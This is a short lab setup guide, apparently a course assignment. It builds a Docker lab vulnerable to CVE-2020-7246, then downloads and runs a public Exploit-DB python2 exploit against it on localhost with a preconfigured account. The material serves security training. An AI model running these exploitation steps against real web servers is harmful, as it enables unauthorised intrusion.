Setting up lab: a) git clone https://github.com/pswalia2u/CVE-2020-7246.git b) cd CVE-2020-7246 && docker build -t cve-assignment:ine . && docker run -it -p 80:80 cve-assignment:ine c) Web server should be accesible @ http://127.0.0.1/index.php d) Preconfigured account: email: developer_1@localhost.com password: developer_1 Exploitation: Using old python2 exploit https://www.exploit-db.com/exploits/47954 a)curl https://www.exploit-db.com/raw/47954 > exploit.py b)Adding "# -*- coding: utf-8 -*-" in top of exploit script sed -i '1s/^/# -*- coding: utf-8 -*-\n/' exploit.py c) Installing python2 and dependencies apt install python2 -y && curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py && python2 get-pip.py && pip2 install requests lxml d) Run exploit python2 exploit.py -url http://127.0.0.1/ -u <user_email> -p <password> python2 exploit.py -url http://127.0.0.1/ -u developer_1@localhost.com -p developer_1